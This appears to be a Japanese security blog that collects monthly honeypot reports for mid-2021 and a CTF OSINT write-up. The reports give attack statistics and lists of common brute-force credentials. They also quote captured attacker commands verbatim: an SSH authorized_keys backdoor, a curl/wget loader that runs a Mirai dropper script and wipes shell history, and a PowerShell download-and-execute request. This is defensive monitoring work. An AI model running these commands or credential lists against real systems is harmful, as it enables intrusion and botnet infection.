ハニーポット運用(月次報告:2021年9月)
今月のTopics
2021年9月2日に、AWSの東京リージョンで大規模な障害が発生した。 2021年9月2日(JST)にAWS Direct Connect サービスの中断により東京リージョン(AP-NORTHEAST-1)で大規模な障害が発生した。
原因はDirect Connect ロケーションと東京リージョンのデータセンターネットワーク間のネットワーク機器の一部で障害が発生したため。午前7時半から障害が発生し、午後1時42分に障害復旧した。(停止時間はおよそ6時間12分)
▽スマートフォンで住所変更などを行う三菱UFJ銀行のアプリ
▽みずほ銀行のネットバンキングのアプリ
▽SBI証券など、ネット証券各社のサイトの一部でアクセスレスポンス低下
▽携帯電話会社のKDDIでも、スマホ決済の「au PAY」にて入金しにくいなどの影響
▽全日空では羽田空港などでチェックインを行うシステムに障害が発生
▽日本航空では貨物の情報に関わる一部のシステムに影響
パブリッククラウドが社会基盤として広く浸透していると共に、基幹システムにおけるパブリッククラウド利用の難しさを改めて考える障害だった。
基幹システムをリリースする上でパブリッククラウドを利用する場合は、大規模障害のリスク費用を見込む必要があるだろう。
T-Potにて1か月運用した結果を記載する。
今月のChangelog
更新無し。
前提条件
運用日時:2021年9月4日-2021年9月30日
運用期間:26日
結果
①各ハニーポットで検知したAttack件数
- T-Potを構成する各ハニーポットへの攻撃件数の一覧を以下に記載する。
| No | ハニーポット | 件数 | 先月比 |
|---|---|---|---|
| 1 | Cowrie | 2,728,448 | 852,542 |
| 2 | Honeytrap | 1,273,466 | 695,801 |
| 3 | Dionaea | 781,324 | 326,267 |
| 4 | Heralding | 625,857 | 120,349 |
| 5 | Rdpy | 158,641 | 64,556 |
| 6 | Ciscoasa | 34,911 | 1,083 |
| 7 | Adbhoney | 30,935 | 15,477 |
| 8 | Mailoney | 14,339 | ▲2,016 |
| 9 | ElasticPot | 8,351 | 801 |
| 10 | ConPot | 3,204 | 1,708 |
| 11 | CitrixHoneypot | 3,058 | 1,539 |
| 12 | Tanner | 3,049 | ▲1,885 |
| 13 | Medpot | 832 | 690 |
- Result
- 先月から各ハニーポットへのアクセス推移は変化なし。
- 先月より観測期間が短いにもかかわらず全体アクセス量が多いことから、9月はアクセス量が多かったと判断される。
②攻撃元の国名と件数(Top 20)
- 各ハニーポットへの攻撃元の国名の総件数を以下に記載する。
| No | 攻撃元の国名 | 件数 | 先月順位 |
|---|---|---|---|
| 1 | China | 1,182,505 | 1(→) |
| 2 | Russia | 1,092,591 | 4(↑) |
| 3 | Netherlands | 696,241 | 2(↓) |
| 4 | United States | 625,600 | 3(↓) |
| 5 | India | 188,088 | 5(→) |
| 6 | Vietnam | 139,583 | 11(↑) |
| 7 | Brazil | 120,196 | 8(↑) |
| 8 | South Korea | 93,259 | 14(↑) |
| 9 | Singapore | 84,560 | 7(↓) |
| 10 | Indonesia | 80,611 | 9(↓) |
| 11 | Germany | 72,968 | 12(↑) |
| 12 | France | 61,991 | 6(↓) |
| 13 | Japan | 60,869 | 10(↓) |
| 14 | Taiwan | 57,376 | 17(↑) |
| 15 | Sweden | 49,960 | 圏外(↑) |
| 16 | Latvia | 49,828 | 18(↑) |
| 17 | Hong Kong | 44,732 | 15(↓) |
| 18 | Mexico | 42,134 | 16(↓) |
| 19 | United Kingdom | 41,848 | 13(↓) |
| 20 | Thailand | 39,474 | 19(↓) |
③検知したCVEの脆弱性と件数
- Suricata(オープンIPS)にて検知した各攻撃の脆弱性の内容を以下に記載する。
| No | CVE ID | Count |
|---|---|---|
| 1 | CVE-2020-11899 | 2,873,189 |
| 2 | CVE-2019-12263 CVE-2019-12261 CVE-2019-12260 CVE-2019-12255 | 1,333 |
| 3 | CVE-2020-11910 | 47 |
| 4 | CVE-2019-0708 CVE-2019-0708 CVE-2019-0708 | 45 |
| 5 | CVE-2014-2321 CVE-2014-2321 | 3 |
- Result
- 先月から変更なし
④よく攻撃されるユーザ名
- ユーザ名でよく攻撃されるキーワード(Top 50)で記載する。
| No | ユーザ名 | 件数 |
|---|---|---|
| 1 | root | 173,845 |
| 2 | admin | 12,600 |
| 3 | knockknockwhosthere | 11,924 |
| 4 | user | 5,966 |
| 5 | sa | 5,852 |
| 6 | hadoop | 5,356 |
| 7 | sh | 3,668 |
| 8 | postgres | 2,890 |
| 9 | 22 | 2,719 |
| 10 | oracle | 2,466 |
| 11 | test | 2,377 |
| 12 | git | 2,287 |
| 13 | mysql | 2,141 |
| 14 | (empty) | 1,846 |
| 15 | nproc | 1,604 |
| 16 | huawei | 1,539 |
| 17 | !root | 1,366 |
| 18 | 2Wire | 1,340 |
| 19 | guest | 1,242 |
| 20 | ubuntu | 1,238 |
| 21 | support | 1,114 |
| 22 | ftpuser | 777 |
| 23 | ftp | 706 |
| 24 | 0 | 696 |
| 25 | adm | 688 |
| 26 | debug | 687 |
| 27 | pi | 687 |
| 28 | 666666 | 686 |
| 29 | blank | 686 |
| 30 | unknown | 662 |
| 31 | www | 614 |
| 32 | administrator | 590 |
| 33 | web | 571 |
| 34 | default | 517 |
| 35 | nagios | 394 |
| 36 | www-data | 377 |
| 37 | anonymous | 335 |
| 38 | testuser | 332 |
| 39 | deploy | 308 |
| 40 | minecraft | 293 |
| 41 | server | 290 |
| 42 | teamspeak | 283 |
| 43 | data | 282 |
| 44 | tomcat | 281 |
| 45 | user1 | 277 |
| 46 | Admin | 255 |
| 47 | test1 | 254 |
| 48 | jenkins | 249 |
| 49 | demo | 248 |
| 50 | ts3 | 245 |
- Result
- 先月から確認され始めた
knockknockwhosthere(3位)のアクセスが継続して多い。SSH Scanning Activityが継続中のようだ。
- 先月から確認され始めた
⑤よく攻撃されるパスワード
- パスワードでよく攻撃されるキーワード(Top 50)を以下に記載する。
| No | パスワード | 件数 |
|---|---|---|
| 1 | admin | 34,796 |
| 2 | knockknockwhosthere | 11,924 |
| 3 | 123456 | 9,806 |
| 4 | (empty) | 6,768 |
| 5 | root | 5,124 |
| 6 | password | 3,926 |
| 7 | 123 | 3,600 |
| 8 | 1 | 3,042 |
| 9 | 12345 | 2,599 |
| 10 | 1234 | 2,215 |
| 11 | blank | 2,030 |
| 12 | nproc | 1,604 |
| 13 | 1q2w3e4r | 1,293 |
| 14 | 12345678 | 1,274 |
| 15 | test | 1,125 |
| 16 | Password | 1,066 |
| 17 | user | 986 |
| 18 | 0 | 917 |
| 19 | 1qaz2wsx | 908 |
| 20 | 666666 | 864 |
| 21 | 0 | 813 |
| 22 | support | 808 |
| 23 | ubnt | 784 |
| 24 | master | 772 |
| 25 | alpine | 748 |
| 26 | qwerty | 743 |
| 27 | backup | 710 |
| 28 | hi3518 | 693 |
| 29 | !ishtar | 688 |
| 30 | unknown | 682 |
| 31 | synnet | 675 |
| 32 | 123456789 | 663 |
| 33 | test123 | 652 |
| 34 | 123123 | 602 |
| 35 | abc123 | 584 |
| 36 | 111111 | 575 |
| 37 | pass | 487 |
| 38 | Passw0rd | 482 |
| 39 | 1234567 | 465 |
| 40 | vizxv | 464 |
| 41 | x | 434 |
| 42 | 123qwe | 411 |
| 43 | admin123 | 410 |
| 44 | p@ssw0rd | 342 |
| 45 | password123 | 332 |
| 46 | changeme | 324 |
| 47 | 123321 | 314 |
| 48 | P@ssw0rd | 311 |
| 49 | 1234567890 | 301 |
| 50 | passw0rd | 292 |
- Result
- miraiなどのIoT系マルウェアにハードコードされたパスワード、簡易なパスワードが今月も大部分を占めていた。
⑥今月のmasscanとZmap
masscanの観測結果は以下の通り。
Zmapの観測結果は以下の通り。
Result
- 特記事項は無し。
最後に
10月はセキュリティ系のイベントが多くて楽しみである。
AVTokyoは是非とも参加したいね。(下戸ですけども... )senpai.loader関連のアクセスは無し。(ただサイト自体はまだ生きている模様だ。)
今月のアクセス。
9/5に1件だけ観測したbase64エンコードされたアクセス。Shellshcockの脆弱性をついてmalwareをダウンロードさせる動作のようだ。
ハニーポット運用(月次報告:2021年8月)
今月のTopics
情報セキュリティ10大脅威 2021 が公開された。 www.ipa.go.jp
「スマホ決済の不正利用」(個人編1位)
個人編の「第1位 スマホ決済の不正利用」は周辺諸国と比較してIT化が遅れてきた日本がキャッシュレス決済の推進により注力すべきセクターになる。まだまだ普及しないマイナンバーカードと連携したITサービスの普及に向けて新規に発足したデジタル庁の積極的な活動が高齢化率が世界1位となった日本の巻き返しの起爆剤となってほしい。
「テレワーク等のニューノーマルな働き方を狙った攻撃」(組織編3位)
組織編では「【3位】テレワーク等のニューノーマルな働き方を狙った攻撃」が新規にランクインしている。2020年から始まったリモートワークも体制が整いつつあり、今後はVPNより効率的なサービスのリリースが見込まれると期待したい。
T-Potにて1か月運用した結果を記載する。
今月のChangelog
更新無し。
前提条件
運用日時:2021年8月1日-2021年8月31日
運用期間:31日
結果
①各ハニーポットで検知したAttack件数
- T-Potを構成する各ハニーポットへの攻撃件数の一覧を以下に記載する。
| No | ハニーポット | 件数 | 先月比 |
|---|---|---|---|
| 1 | Cowrie | 1875906 | 159,463 |
| 2 | Honeytrap | 577665 | ▲248,060 |
| 3 | Heralding | 505508 | ▲682,837 |
| 4 | Dionaea | 455057 | 101,030 |
| 5 | Rdpy | 94085 | ▲12,205 |
| 6 | Ciscoasa | 33828 | ▲68 |
| 7 | Mailoney | 16355 | 1,831 |
| 8 | Adbhoney | 15458 | 6,191 |
| 9 | ElasticPot | 7550 | 6,329 |
| 10 | Tanner | 4934 | ▲341 |
| 11 | CitrixHoneypot | 1519 | ▲110 |
| 12 | ConPot | 1496 | ▲86 |
| 13 | Medpot | 142 | ▲6 |
- Result
- 他のハニーポットの調査件数が減る中でCowrieへのアクセスが継続して多かった。
②攻撃元の国名と件数(Top 20)
- 各ハニーポットへの攻撃元の国名の総件数を以下に記載する。
| No | 攻撃元の国名 | 件数 | 先月順位 |
|---|---|---|---|
| 1 | China | 730,648 | 3(↑) |
| 2 | Netherlands | 567,144 | 1(↓) |
| 3 | United States | 492,469 | 4(↑) |
| 4 | Russia | 373,435 | 2(↓) |
| 5 | India | 99,081 | 9(↑) |
| 6 | France | 93,956 | 6(→) |
| 7 | Singapore | 85,728 | 8(↑) |
| 8 | Brazil | 78,177 | 13(↑) |
| 9 | Indonesia | 65,453 | 17(↑) |
| 10 | Japan | 61,394 | 10(→) |
| 11 | Vietnam | 60,102 | 11(→) |
| 12 | Germany | 56,065 | 15(↑) |
| 13 | United Kingdom | 55,834 | 20(↑) |
| 14 | South Korea | 54,772 | 14(→) |
| 15 | Hong Kong | 44,797 | 圏外(↑) |
| 16 | Mexico | 35,419 | 圏外(↑) |
| 17 | Taiwan | 29,191 | 圏外(↑) |
| 18 | Latvia | 26,666 | 16(↓) |
| 19 | Thailand | 26,552 | 圏外(↑) |
| 20 | Albania | 25,589 | 圏外(↑) |
- Result
- 中国が久しぶりに1位に返り咲いた。
- ロシアが久しぶりに4位へ後退。変わってアメリカが3位に上がった。まるでメダル争いのようだ。
③検知したCVEの脆弱性と件数
- Suricata(オープンIPS)にて検知した各攻撃の脆弱性の内容を以下に記載する。
| No | CVE ID | Count |
|---|---|---|
| 1 | CVE-2020-11899 | 1,261,316 |
| 2 | CVE-2019-12263 CVE-2019-12261 CVE-2019-12260 CVE-2019-12255 | 419 |
| 3 | CVE-2019-0708 CVE-2019-0708 CVE-2019-0708 | 26 |
| 4 | CVE-2020-11910 | 1 |
| 5 | CVE-2021-27561 CVE-2021-27561 CVE-2021-27562 CVE-2021-27561 | 1 |
- Result
- 新規の脆弱性なし
④よく攻撃されるユーザ名
- ユーザ名でよく攻撃されるキーワード(Top 50)で記載する。
| No | ユーザ名 | 件数 |
|---|---|---|
| 1 | root | 85,576 |
| 2 | admin | 43,240 |
| 3 | knockknockwhosthere | 16,731 |
| 4 | sh | 5,713 |
| 5 | test | 4,854 |
| 6 | user | 4,761 |
| 7 | sa | 4,166 |
| 8 | nproc | 3,685 |
| 9 | ubuntu | 3,673 |
| 10 | postgres | 3,163 |
| 11 | oracle | 2,433 |
| 12 | git | 2,142 |
| 13 | ftpuser | 1,960 |
| 14 | deploy | 1,444 |
| 15 | hadoop | 1,435 |
| 16 | 22 | 1,386 |
| 17 | guest | 1,337 |
| 18 | default | 1,291 |
| 19 | minecraft | 1,270 |
| 20 | mysql | 1,182 |
| 21 | support | 1,164 |
| 22 | www | 1,124 |
| 23 | testuser | 1,108 |
| 24 | teamspeak | 1,086 |
| 25 | nagios | 957 |
| 26 | server | 942 |
| 27 | user1 | 907 |
| 28 | web | 906 |
| 29 | administrator | 884 |
| 30 | ftp | 882 |
| 31 | (empty) | 866 |
| 32 | www-data | 855 |
| 33 | tomcat | 836 |
| 34 | ts3 | 812 |
| 35 | jenkins | 744 |
| 36 | student | 715 |
| 37 | teamspeak3 | 704 |
| 38 | test1 | 695 |
| 39 | tester | 693 |
| 40 | 2Wire | 685 |
| 41 | !root | 681 |
| 42 | dev | 674 |
| 43 | webmaster | 667 |
| 44 | alex | 663 |
| 45 | vbox | 647 |
| 46 | demo | 643 |
| 47 | steam | 629 |
| 48 | ts | 605 |
| 49 | sysadmin | 586 |
| 50 | testftp | 577 |
- Result
- knockknockwhosthere(3位)を新規に確認した。
⑤よく攻撃されるパスワード
- パスワードでよく攻撃されるキーワード(Top 50)を以下に記載する。
| No | パスワード | 件数 |
|---|---|---|
| 1 | knockknockwhosthere | 16,731 |
| 2 | admin | 14,759 |
| 3 | 123456 | 11,421 |
| 4 | 123 | 5,127 |
| 5 | password | 4,426 |
| 6 | (empty) | 4,027 |
| 7 | nproc | 3,681 |
| 8 | 1 | 3,327 |
| 9 | 1234 | 3,299 |
| 10 | 12345 | 3,109 |
| 11 | root | 2,138 |
| 12 | test | 1,851 |
| 13 | 123123 | 1,442 |
| 14 | 12345678 | 1,413 |
| 15 | 1qaz2wsx | 1,248 |
| 16 | 1q2w3e4r | 1,226 |
| 17 | vizxv | 1,218 |
| 18 | blank | 1,052 |
| 19 | pass | 1,009 |
| 20 | qwerty | 983 |
| 21 | test123 | 958 |
| 22 | 123456789 | 952 |
| 23 | 123321 | 929 |
| 24 | a | 891 |
| 25 | P@ssw0rd | 794 |
| 26 | 123qwe | 790 |
| 27 | 111111 | 751 |
| 28 | abc123 | 733 |
| 29 | p@ssw0rd | 725 |
| 30 | user | 714 |
| 31 | passw0rd | 697 |
| 32 | admin123 | 633 |
| 33 | password123 | 630 |
| 34 | 1234567 | 629 |
| 35 | 12 | 535 |
| 36 | 1qaz@WSX | 520 |
| 37 | qwe123 | 508 |
| 38 | support | 471 |
| 39 | 666666 | 451 |
| 40 | pass123 | 423 |
| 41 | ubnt | 414 |
| 42 | 1q2w3e | 412 |
| 43 | changeme | 396 |
| 44 | qwer1234 | 393 |
| 45 | backup | 376 |
| 46 | master | 371 |
| 47 | 0 | 368 |
| 48 | q1w2e3 | 366 |
| 49 | qwerty123 | 351 |
| 50 | 1q2w3e4r5t6y | 332 |
- Result
- ユーザ名と同じ
knockknockwhosthereというパスワードのアクセスが急激に増加していた。
SANSのCowrieでも同様のSSH Scanning Activityを観測しているようだ
- ユーザ名と同じ
https://isc.sans.edu/ssh.htmlisc.sans.edu
⑥今月のmasscanとZmap
masscanの観測結果は以下の通り。
Zmapの観測結果は以下の通り。
Result
- massscanが0件だった。こんな日がくるとは...
- Zmapは相変わらず多い。
最後に
東京オリンピック開催期間直後の8月9日からuser : knockknockwhosthere/pass : knockknockwhosthereのSSH Scanning Activityが急激に増加していた。何らかの製品に起因するアカウントでもなく、特定の国ではなく各国よりアクセスがみられるためオリンピックに起因したものと推測している。
今月多かったアクセス。
コマンド :"cd ~ && rm -rf .ssh && mkdir .ssh && echo ""ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr"">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~",
- 今月の面白かったアクセス。ビルゲイツ先輩?
IPアドレス:136.144.41.41 コマンド :cd /var/tmp ; curl -s -L -O 31.210.20.142/.billgates/.senpai.loader || wget --no-check-certificate 31.210.20.142/.billgates/.senpai.loader ; chmod 777 .senpai.loader ; ./.senpai.loader ; rm -rf .senpai.loader ; history -c ; rm -rf ~/.bash_history 接続元 :United States
このURL配下の.senpai.loaderへアクセスしてみると難読化されていないシェルスクリプトが表示される。
現役のMiraiのBotnetとのこと。
31.210.20.142がDropperサイトになる。.senpai.loaderは264行からなるシェルスクリプトで構成されており、環境に合わせて対応するmalwareがダウンロードされるようだ。
こんな感じのスクリプトが延々と...
危険なので、「でりとっ!」 (ばんばん)
setodaNoteCTF - Writeup (OSINT : secret_operation)
8/21(土) 21:00 JST~9/4(土) 21:00 JSTに開催されたsetodaNoteCTF に会社のチームで参加した。 他のチームメンバーの陰で解けた問題のWriteupを記載する。
OSINT
secret_operation
あなたと同僚は敵対組織が秘密裏に進めているオペレーションの調査を命じられました。 「どうやら事を起こそうとしているようだ。」 調査開始からしばらく経った頃、同僚からある画像が届きました。それはかなり不鮮明だったものの、どこかの Web ページを写したと思われる画像データでした。詳細を確認しようと同僚と連絡をとろうとしましたが返信はなく、同僚からの連絡はそれを最後に途絶えてしまいました。画像の Web ページを調査し敵対組織が秘密裏に進めているオペレーションを明らかにしなければ。 添付されたファイルを解析し、フラグを得てください。
添付ファイルの画像に記載された以下のURLへアクセスすると接続元の情報が表示される。
まずは添付ファイルの接続元が表示されるように偽装する必要があるようだ。
X-Forwarded-Forの指定によるアクセスではうまく偽装されないため、VPNかプロキシ経由であれば接続元が変更されることを確認した。今回は一時的にプロキシ経由でロシアのサンクト・ペテルブルグからつなげた。(OSのプロキシ設定と独立しているFirefoxのブラウザ設定のプロキシ設定を変更して確認すると便利かな~と思います。)
添付ファイルの画像と同じアクセス元でアクセスすることで得られた情報は3つになる。
①Twitterのアカウント
@aarron142857
②サイトのURL(basic認証が必要)
https://billowing-poetry-3254.setodanote.net
③ロシア語?のことわざ
Молодец против овец, а против молодца и сам овца.
②のbasic認証が必要なURLについてヒントになりそうなものがなく、ここで詰まった。(セキュリティツールのhydra?現実的ではなさそうだ...)
色々調べていくと問題のTwitterアカウントがいいねしている内容で以下のものがあった。画像ファイルにzipを組み込む記事。
I found a way to stuff up to ~3MB of data inside a PNG file on twitter. This is even better than my previous JPEG ICC technique, since the inserted data is contiguous.
— David Buchanan (@David3141593) 2021年3月17日
The source code is available in the ZIP/PNG file attached: pic.twitter.com/zEOl2zJYRC
投稿している画像を確認すると1番最初の画像だけpngで後はjpeg形式。
対象のpng画像を確認するとUserとパスワードが記載された画像が末尾に付与されていた。
画像の情報は②サイトのURLに入力するアカウント/パスワードになる。
CHECK MY BIOはTwitterのJ.Sの記載が該当する。
②のサイトに得られたアカウントでログインすると以下の画面が表示される。
ユーザ名:J.S
パスワード:right_next_to_you
再度一時的にプロキシの設定を変更してロシアからのアクセスに偽装すると修正された部分のflagが見えた。
flag{=we_can_change_tomorrow=}
感想
・主催者様へ、素晴らしい大会を開催頂き有難うございました。
取り組みやすい問題が多く 非常に楽しかったです。
ハニーポット運用(月次報告:2021年7月)
今月のTopics
6月29日にGithub上にてWindowsの印刷スプーラーの脆弱性(CVE-2021-1675)を悪用した任意コードの実行を可能とするPocが公開された。公開情報は削除されたものの、ドメインコントローラや特定の状況を満たす非ドメインコントローラ環境への攻撃に対しては依然として有効であった。7月1日にWindows 印刷スプーラーのリモートでコードが実行される脆弱性(CVE-2021-34527)としてMS社が公開するに至った。
7月7日に脆弱性の対策パッチが定例外の緊急パッチとして報告されたが、7月8日に判明した情報より特定の条件下により以前として脆弱性は残るとのこと。
MS社ではパッチ適用と併せて以下のレジストリへの対策を公開している。
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PointAndPrint -> NoWarningNoElevationOnInstall = 0 (DWORD) または未定義 (既定の設定) -> UpdatePromptSettings = 0 (DWORD) または未定義 (既定の設定)
MS社が公開している回避策は以下の2点だが、どちらも業務影響が大きくある。
オプション 1: 印刷スプーラー サービスを無効にする
・Print Spoolerサービスを停止した上で、無効化する。
※「サービス」からPrint Spoolerサービスを停止してもよい。
※この方法だとほぼプリンター印刷ができなくなり、環境によりPDF形式でのドキュメント保存もできなくなる。
※Excelなどの「改ページプレビュー」の指定範囲が滅茶苦茶になるので納品ドキュメントで印刷用に指定していた改ページの設定が無に帰す。(ヤメテー)
オプション 2 - グループ ポリシーで受信リモート印刷を無効にする
・mmc.exeからMicrosoft管理コンソールを起動する。
・スナップインの追加と削除からグループポリシーオブジェクトエディターを開く
[コンピューターの構成]/[管理用テンプレート]/[プリンター]
[印刷スプーラーにクライアント接続の受け入れを許可する] ポリシーを無効にする。
※グループ ポリシーを有効にするには、印刷スプーラー サービスを再起動する必要あり。
※適用したことによる他サービスへの影響が不明なリスク有り。
T-Potにて1か月運用した結果を記載する。
今月のChangelog
更新無し。
前提条件
運用日時:2021年7月1日-2021年7月31日
運用期間:31日
結果
①各ハニーポットで検知したAttack件数
- T-Potを構成する各ハニーポットへの攻撃件数の一覧を以下に記載する。
| No | ハニーポット | 件数 | 先月比 |
|---|---|---|---|
| 1 | Cowrie | 1,716,443 | ▲1,707,411 |
| 2 | Heralding | 1,188,345 | 432,859 |
| 3 | Honeytrap | 825,725 | 306,439 |
| 4 | Dionaea | 354,027 | 2,638 |
| 5 | Rdpy | 106,290 | 17,712 |
| 6 | Ciscoasa | 33,896 | 32,477 |
| 7 | Mailoney | 14,524 | 3,682 |
| 8 | Adbhoney | 9,267 | ▲5,433 |
| 9 | Tanner | 5,275 | 1,074 |
| 10 | CitrixHoneypot | 1,629 | 119 |
| 11 | ConPot | 1,582 | ▲519 |
| 12 | ElasticPot | 1,221 | ▲48 |
| 13 | Medpot | 148 | ▲8 |
- Result
- 通常時と比較してCiscoasaのアクセスが増加していた。確認すると中国から7/12 0時と7/19 12時にアクセス数が増えていた模様。
②攻撃元の国名と件数(Top 20)
- 各ハニーポットへの攻撃元の国名の総件数を以下に記載する。
| No | 攻撃元の国名 | 件数 | 先月順位 |
|---|---|---|---|
| 1 | Netherlands | 877,814 | 4(↑) |
| 2 | Russia | 813,285 | 3(↑) |
| 3 | China | 587,526 | 2(↓) |
| 4 | United States | 318,650 | 6(↑) |
| 5 | Ireland | 300,833 | 1(↓) |
| 6 | France | 211,467 | 8(↑) |
| 7 | Panama | 160,954 | 5(↓) |
| 8 | Singapore | 63,908 | 13(↑) |
| 9 | India | 60,133 | 9(→) |
| 10 | Japan | 57,348 | 19(↑) |
| 11 | Vietnam | 57,054 | 11(→) |
| 12 | Italy | 52,591 | 圏外(↑) |
| 13 | Brazil | 50,198 | 14(↑) |
| 14 | South Korea | 47,526 | 12(↓) |
| 15 | Germany | 26,492 | 18(↑) |
| 16 | Latvia | 25,643 | 圏外(↑) |
| 17 | Indonesia | 24,047 | 16(↓) |
| 18 | Bulgaria | 23,768 | 10(↓) |
| 19 | Sweden | 21,615 | 20(↑) |
| 20 | United Kingdom | 19,831 | 圏外(↑) |
③検知したCVEの脆弱性と件数
- Suricata(オープンIPS)にて検知した各攻撃の脆弱性の内容を以下に記載する。
| No | CVE ID | Count |
|---|---|---|
| 1 | CVE-2020-11899 | 1,405,632 |
| 2 | CVE-2019-12263 CVE-2019-12261 CVE-2019-12260 CVE-2019-12255 | 259 |
| 3 | CVE-2019-0708 CVE-2019-0708 CVE-2019-0708 | 22 |
| 4 | CVE-2020-11910 | 8 |
| 5 | CVE-2020-8515 CVE-2020-8515 | 1 |
- Result
- 先月から変更なし
④よく攻撃されるユーザ名
- ユーザ名でよく攻撃されるキーワード(Top 50)で記載する。
| No | ユーザ名 | 件数 |
|---|---|---|
| 1 | root | 171,490 |
| 2 | admin | 38,106 |
| 3 | sh | 3,526 |
| 4 | support | 3,525 |
| 5 | user | 3,112 |
| 6 | nproc | 2,981 |
| 7 | sa | 1,598 |
| 8 | 22 | 1,443 |
| 9 | test | 1,065 |
| 10 | 1,064 | |
| 11 | default | 998 |
| 12 | ubuntu | 662 |
| 13 | postgres | 582 |
| 14 | 2Wire | 538 |
| 15 | guest | 518 |
| 16 | !root | 510 |
| 17 | oracle | 434 |
| 18 | www | 415 |
| 19 | git | 379 |
| 20 | adm | 374 |
| 21 | 666666 | 365 |
| 22 | debug | 365 |
| 23 | unknown | 362 |
| 24 | ftpuser | 326 |
| 25 | administrator | 320 |
| 26 | Admin | 307 |
| 27 | anonymous | 298 |
| 28 | www-data | 280 |
| 29 | web | 242 |
| 30 | user123 | 239 |
| 31 | ftp | 236 |
| 32 | minecraft | 226 |
| 33 | blank | 218 |
| 34 | mysql | 216 |
| 35 | deploy | 198 |
| 36 | pi | 196 |
| 37 | 0 | 194 |
| 38 | db | 184 |
| 39 | data | 178 |
| 40 | wwwroot | 176 |
| 41 | testuser | 175 |
| 42 | ubnt | 166 |
| 43 | user1 | 162 |
| 44 | minerstat | 161 |
| 45 | mos | 160 |
| 46 | operator | 149 |
| 47 | jenkins | 147 |
| 48 | MISASME2021 | 144 |
| 49 | MISASME2020 | 141 |
| 50 | 101 | 136 |
- Result
- MISASME2020(48位)とMISASME(49位)を新規に確認した。
調査した限りではベトナムのMISA社の会計ソフトと想定される。
- MISASME2020(48位)とMISASME(49位)を新規に確認した。
⑤よく攻撃されるパスワード
- パスワードでよく攻撃されるキーワード(Top 50)を以下に記載する。
| No | パスワード | 件数 |
|---|---|---|
| 1 | admin | 89,980 |
| 2 | 4,295 | |
| 3 | support | 3,417 |
| 4 | nproc | 2,981 |
| 5 | 123456 | 2,887 |
| 6 | root | 2,522 |
| 7 | password | 1,795 |
| 8 | 1234 | 1,379 |
| 9 | 123 | 1,318 |
| 10 | 1 | 1,046 |
| 11 | 12345 | 1,013 |
| 12 | blank | 935 |
| 13 | vizxv | 919 |
| 14 | 12345678 | 789 |
| 15 | user | 596 |
| 16 | ubnt | 531 |
| 17 | test | 496 |
| 18 | 666666 | 458 |
| 19 | 0 | 437 |
| 20 | alpine | 407 |
| 21 | backup | 390 |
| 22 | master | 390 |
| 23 | hi3518 | 378 |
| 24 | unknown | 370 |
| 25 | 1q2w3e4r | 356 |
| 26 | 123123 | 354 |
| 27 | synnet | 350 |
| 28 | Password | 327 |
| 29 | 1qaz2wsx | 309 |
| 30 | 111111 | 270 |
| 31 | 123456789 | 221 |
| 32 | passw0rd | 221 |
| 33 | 0 | 219 |
| 34 | ABCabc@123 | 207 |
| 35 | pass | 205 |
| 36 | qwerty | 193 |
| 37 | guest | 191 |
| 38 | 1234567 | 176 |
| 39 | 123321 | 169 |
| 40 | p@ssw0rd | 165 |
| 41 | iloveyou | 163 |
| 42 | princess | 158 |
| 43 | Passw0rd | 156 |
| 44 | !ishtar | 150 |
| 45 | operator | 148 |
| 46 | abc123 | 146 |
| 47 | Admin | 143 |
| 48 | test123 | 143 |
| 49 | abcABC@123 | 139 |
| 50 | mos | 137 |
- Result
- synnet(27位)は3COM社の各種ルータのデフォルトパスワードのため、変更していない場合は注意が必要。中でもCellPlexモデルの機器ではadmin権限が割り当てられているので特に注意すべき。
⑥今月のmasscanとZmap
masscanの観測結果は以下の通り。
Zmapの観測結果は以下の通り。
Result
- 特記事項は無し。
最後に
- PrintNightmare関連アクセスはT-Pot上で観測できず。
- shファイルとexeファイル関連の問い合わせは以下の通り。
◆shファイルに関するアクセス
http://168[.]138[.]143[.]186/setup.sh
http://betaalverzoek.ir/binInfect.sh
ftp://anonymous:anonymous@betaalverzoek.ir/binInfect1.sh
◆exeファイルに関するアクセス
/FxCodeShell.jsp?wiew=FxxkMyLie1836710Aa&os=1&address=http://a46.bulehero.in/download.exe
/cgi-bin/bfenterprise/clientregister.exe?RequestType=FetchCommands
/public/hydra.php?xcmd=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','C:/Windows/temp/iwgvymtjindipcg2429.exe');start%20C:/Windows/temp/iwgvymtjindipcg2429.exe
ハニーポット運用(月次報告:2021年6月)
今月のTopics
コンテンツ配信ネットワーク(CDN)プロバイダのFastlyで2021年6月8日に発生したシステム障害により世界中のインターネットサービスに影響が発生した。The GuardianやThe New York Timesなどの大手メディア、Amazonなどの流通サービス、PayPalなどの決済サービス、英国政府サイト(gov.uk)の政府機関など影響範囲は多岐に及んだ。また日本においてもメルカリやnote、Spotify、楽天市場、GitHubなどにも影響が発生した模様。
status.fastly.com japan.cnet.com wired.jp
詳しい理由は公表されていないがソフトウェア内に潜んでいた未発見のバグが、顧客側の設定変更に影響を受けて発生したようだ。 DDosによりサービス提供が困難になった場合の影響が良く理解できる障害であった。また1時間程度で復旧できたのは不幸中の幸いである。
業務に爽快感を求めてはいけないが、特にインフラ作業においては当たり前のように利用できることを維持することが最も重要である。
今月のChangelog
更新無し。
前提条件
運用日時:2021年6月1日-2021年6月30日
運用期間:30日
結果
①各ハニーポットで検知したAttack件数
- T-Potを構成する各ハニーポットへの攻撃件数の一覧を以下に記載する。
| No | ハニーポット | 件数 | 先月比 |
|---|---|---|---|
| 1 | Cowrie | 3,423,854 | ▲517,210 |
| 2 | Heralding | 755,486 | ▲247,859 |
| 3 | Honeytrap | 519,286 | ▲197,447 |
| 4 | Dionaea | 351,389 | 11,897 |
| 5 | Rdpy | 88,578 | ▲78,336 |
